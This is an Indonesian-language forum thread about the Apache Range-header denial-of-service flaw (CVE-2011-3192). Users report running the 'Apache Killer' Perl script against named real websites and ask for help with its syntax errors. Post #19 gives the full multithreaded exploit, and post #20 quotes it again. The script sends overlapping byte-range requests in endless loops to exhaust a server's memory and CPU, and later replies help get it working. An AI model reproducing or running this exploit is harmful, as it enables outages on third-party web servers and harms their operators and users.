Apache DoS Vulnerability (CVE-2011-3192)
#11
mau tanya lg bro...
kalo hasil pas saya test
Code:
#perl scripttest9.pl YES  www.target.com
Testing for partial content exploit against www.target.com/...
Host: www.target.com appears to not be vulnerable, returned:
HTTP/1.1 200 OK
gmn tuh bro?

#12
(10-24-2011, 06:30 PM)betefive Wrote: mau tanya lg bro...
kalo hasil pas saya test
Code:
#perl scripttest9.pl YES  www.target.com
Testing for partial content exploit against www.target.com/...
Host: www.target.com appears to not be vulnerable, returned:
HTTP/1.1 200 OK
gmn tuh bro?

berarti ga bisa bro Smile

dia udah update atau udh di patch

#13
angka 200 itu berarti sebenarnya di temukan tapi gk vurln

#14
ow gtu ya,,, sipp...sipp... thx informasinya ....

#15
apa berlaku buat apache tomcat juga Om?
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#16
Bang ane ada problem , in kenapa yah ?

Quote:root@bt:~/Apache DoS Vulnerability# perl apachedos.pl www.bajubayilucumurah.com
Scalar found where operator expected at apachedos.pl line 67, near "$real"
(Missing semicolon on previous line?)
syntax error at apachedos.pl line 67, near "$real "
syntax error at apachedos.pl line 71, near "&testapache;"
Execution of apachedos.pl aborted due to compilation errors.
Quote:Call me Dillah , Okey ?

#17
Punyaku ERROR kya gni jga om
[shcode] perl apache_killer.pl unmer.ac.id
Semicolon seems to be missing at apache_killer.pl line 7.
syntax error at apache_killer.pl line 11, near ")

#Original
by Kingcope

#Altered
"
"use" not allowed in expression at apache_killer.pl line 21, near ""
BEGIN not safe after errors--compilation aborted at apache_killer.pl line 22.[/shcode]

Mhon di bantu om:-?

#18
Salah copas kali tuh .. download dari source langsung saja
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#19
berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:
Spoiler! :
Code:
#!/usr/bin/perl
    
    # Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
    # Original by Kingcope
    # Altered by W
    # Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use threads;
    
    sub usage
    {
            print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
            print "Originally by Kingcope\n";
            print "Altered to use threads by W\n";
            print "Usage: $0 <attack> <host> [page=/] [threads=50]\n";
            print "Example: $0 YES www.example.com index.html 50\n";
            print "If attack is anything other than 'YES', then the tool will test and exit.\n";
    }
    
    sub testapache
    {
            print "Testing for partial content exploit against $host$path...\n";
    
            my $sock = IO::Socket::INET->new(PeerAddr => $host,
                    PeerPort => "80",
                    Proto    => 'tcp') or die "Can't open socket to $host!\n";
    
            my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
            print $sock $p;
    
            my $x = <$sock>;
            if ($x =~ /Partial/)
            {
                    print "Host: $host appears to be vulnerable to partial content DoS\n";
                    return 1;
                    } else {
                    print "Host: $host appears to not be vulnerable, returned:\n$x";
                    return 0;
            }
    }
    
    sub exploitserver
    {
            my $sock = IO::Socket::INET->new(PeerAddr => $host,
                    PeerPort => "80",
                    Proto    => 'tcp') or return(0);
            print $sock $p;
    
            while(<$sock>)
            {
            }
            print ".";
    }
    
    
    if ($ # ARGV < 1)
    {
            &usage && exit;
    }
    
    $real = ($ARGV[0] eq 'YES');
    $host = $ARGV[1];
    $path = ($ # ARGV > 1) ? '/' . $ARGV[2] : '/';
    $numthreads = ($ # ARGV > 2) ? $ARGV[3] : 50;
    $vuln = &testapache;
    
    srand(time());
    my $r = "";
    
    for ($k=0;$k<1300;$k++)
    {
            $r .= ",5-$k";
    }
    
    $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    if($vuln && $real)
    {
            my @threads;
            $|=1;
    
            print "Running partial content exploit against $host$path using $numthreads threads\n";
            for(my $n = 0; $n < $numthreads; $n++)
            {
                    my $thr = async { while(1){ &exploitserver; } };
                    push(@threads, $thr);
            }
            foreach(@threads)
            {
                    $_->join();
                    print($_);
            }
    }


om maap ni yak, cuman info buat temen2 juga yang kalo copas dari trit. nah kenapa ketika copas langsung dari trit itu kadang2 kagak work toolnya atau ada yang error syntax nya. di karena kan, coba liat tuh syntax yang berwarna merah (kalo yang diatas udah ane edit jadi kagak ada warna merah lagi, liat di source code nya om ikon, nah itu yang mengakibatkan error. di karena kan tanda # yang berarti menon-aktifkan code tapi malah ter-enter dengan sendirinya sehingga kata yang di tandai # itu berubah menjadi aktif. makanya error. . . pengalaman ane bikin trit, ane tes kagak work dari file ane work., ane edit lagi supaya kagak ada warna merah di source code trit, nah pas di copas dan di jalankan ternyata running Big Grin . (sekedar info doang) Big Grin

Quote:~ Tan Hana Wighna Tan Sirna ~

#20
(12-08-2012, 02:26 AM)gnome_selpa Wrote: berikut adalah skrip yg ada di Pastebin (sry link-nya ane lupa copy, google-fu aja), namanya Apache Killer:
Spoiler! :
Code:
#!/usr/bin/perl
    
    # Apache httpd Remote Denial of Service (CPU  & memory exhaustion)
    # Original by Kingcope
    # Altered by W
    # Year 2011
    #
    # Will result in swapping memory to filesystem on the remote side
    # plus killing of processes when running out of swap space.
    # Remote System becomes unstable.
    #
    
    use IO::Socket;
    use threads;
    
    sub usage
    {
            print "Apache Remote Denial of Service (CPU & memory exhaustion)\n";
            print "Originally by Kingcope\n";
            print "Altered to use threads by W\n";
            print "Usage: $0 <attack> <host> [page=/] [threads=50]\n";
            print "Example: $0 YES www.example.com index.html 50\n";
            print "If attack is anything other than 'YES', then the tool will test and exit.\n";
    }
    
    sub testapache
    {
            print "Testing for partial content exploit against $host$path...\n";
    
            my $sock = IO::Socket::INET->new(PeerAddr => $host,
                    PeerPort => "80",
                    Proto    => 'tcp') or die "Can't open socket to $host!\n";
    
            my $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
            print $sock $p;
    
            my $x = <$sock>;
            if ($x =~ /Partial/)
            {
                    print "Host: $host appears to be vulnerable to partial content DoS\n";
                    return 1;
                    } else {
                    print "Host: $host appears to not be vulnerable, returned:\n$x";
                    return 0;
            }
    }
    
    sub exploitserver
    {
            my $sock = IO::Socket::INET->new(PeerAddr => $host,
                    PeerPort => "80",
                    Proto    => 'tcp') or return(0);
            print $sock $p;
    
            while(<$sock>)
            {
            }
            print ".";
    }
    
    
    if ($ # ARGV < 1)
    {
            &usage && exit;
    }
    
    $real = ($ARGV[0] eq 'YES');
    $host = $ARGV[1];
    $path = ($ # ARGV > 1) ? '/' . $ARGV[2] : '/';
    $numthreads = ($ # ARGV > 2) ? $ARGV[3] : 50;
    $vuln = &testapache;
    
    srand(time());
    my $r = "";
    
    for ($k=0;$k<1300;$k++)
    {
            $r .= ",5-$k";
    }
    
    $p = "HEAD $path HTTP/1.1\r\nHost: $host\r\nRange:bytes=0-5$r\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n";
    if($vuln && $real)
    {
            my @threads;
            $|=1;
    
            print "Running partial content exploit against $host$path using $numthreads threads\n";
            for(my $n = 0; $n < $numthreads; $n++)
            {
                    my $thr = async { while(1){ &exploitserver; } };
                    push(@threads, $thr);
            }
            foreach(@threads)
            {
                    $_->join();
                    print($_);
            }
    }


om maap ni yak, cuman info buat temen2 juga yang kalo copas dari trit. nah kenapa ketika copas langsung dari trit itu kadang2 kagak work toolnya atau ada yang error syntax nya. di karena kan, coba liat tuh syntax yang berwarna merah (kalo yang diatas udah ane edit jadi kagak ada warna merah lagi, liat di source code nya om ikon, nah itu yang mengakibatkan error. di karena kan tanda # yang berarti menon-aktifkan code tapi malah ter-enter dengan sendirinya sehingga kata yang di tandai # itu berubah menjadi aktif. makanya error. . . pengalaman ane bikin trit, ane tes kagak work dari file ane work., ane edit lagi supaya kagak ada warna merah di source code trit, nah pas di copas dan di jalankan ternyata running Big Grin . (sekedar info doang) Big Grin

thx om informasinya, jadi fix dah Big Grin

btw klo copas source pake konsol aja biar formattingnya ga ikutan






Users browsing this thread: 2 Guest(s)